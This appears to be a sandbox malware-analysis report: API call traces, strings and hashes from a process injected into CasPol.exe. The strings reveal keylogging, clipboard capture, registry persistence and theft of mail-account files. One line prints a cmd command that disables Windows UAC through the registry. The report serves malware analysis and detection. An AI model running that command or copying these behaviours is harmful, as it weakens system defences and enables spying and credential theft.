                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                    • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                    • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                    • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                    • _free.LIBCMT ref: 10005B2D
                                                                                                                    • _free.LIBCMT ref: 10005B55
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                    • _abort.LIBCMT ref: 10005B74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                    • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                    • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                    • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221034970-0
                                                                                                                    • Opcode ID: facabc629ece00eb5c6b8119d2553d40166156de758601b1177479ca1c3dec6c
                                                                                                                    • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                    • Opcode Fuzzy Hash: facabc629ece00eb5c6b8119d2553d40166156de758601b1177479ca1c3dec6c
                                                                                                                    • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221034970-0
                                                                                                                    • Opcode ID: 48f7f48bbaef7dc56ded15f7c4ab138f238c70d6356feb2091f1178006fb1abd
                                                                                                                    • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                    • Opcode Fuzzy Hash: 48f7f48bbaef7dc56ded15f7c4ab138f238c70d6356feb2091f1178006fb1abd
                                                                                                                    • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221034970-0
                                                                                                                    • Opcode ID: 9d56ba1c0ab4f3c7c35dd1a36e14f7b770e45bff24f4a3e5cfd9a6ef981b4461
                                                                                                                    • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                    • Opcode Fuzzy Hash: 9d56ba1c0ab4f3c7c35dd1a36e14f7b770e45bff24f4a3e5cfd9a6ef981b4461
                                                                                                                    • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                    APIs
                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$InfoQueryValue
                                                                                                                    • String ID: [regsplt]$DG
                                                                                                                    • API String ID: 3554306468-1089238109
                                                                                                                    • Opcode ID: 23ecd6cd4b210895098c6e82fed9f94bfa90ac4909f2c75c9ab06080acf4478e
                                                                                                                    • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                    • Opcode Fuzzy Hash: 23ecd6cd4b210895098c6e82fed9f94bfa90ac4909f2c75c9ab06080acf4478e
                                                                                                                    • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                    • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                    • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                    • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                    • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                    • API String ID: 2974294136-4018440003
                                                                                                                    • Opcode ID: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
                                                                                                                    • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                    • Opcode Fuzzy Hash: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
                                                                                                                    • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                    • wsprintfW.USER32 ref: 0040A905
                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                    • Opcode ID: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
                                                                                                                    • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                    • Opcode Fuzzy Hash: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
                                                                                                                    • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                    • String ID: `AG
                                                                                                                    • API String ID: 1958988193-3058481221
                                                                                                                    • Opcode ID: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
                                                                                                                    • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                    • Opcode Fuzzy Hash: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
                                                                                                                    • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                    APIs
                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                    • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                    • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                    • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                    • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                    • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                    Strings
                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                    • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                    • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                    • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                    • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                    • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                    • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                    • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                    • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateValue
                                                                                                                    • String ID: pth_unenc$BG
                                                                                                                    • API String ID: 1818849710-2233081382
                                                                                                                    • Opcode ID: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
                                                                                                                    • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                    • Opcode Fuzzy Hash: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
                                                                                                                    • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                    • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                    • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                    • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                    • SetEvent.KERNEL32(000002C0), ref: 00404AF9
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                    • Opcode ID: 2c413dba4ec25e9a557225f3b5e8a330a8ff44d2cc7f690761566cb273d0ee99
                                                                                                                    • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                    • Opcode Fuzzy Hash: 2c413dba4ec25e9a557225f3b5e8a330a8ff44d2cc7f690761566cb273d0ee99
                                                                                                                    • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
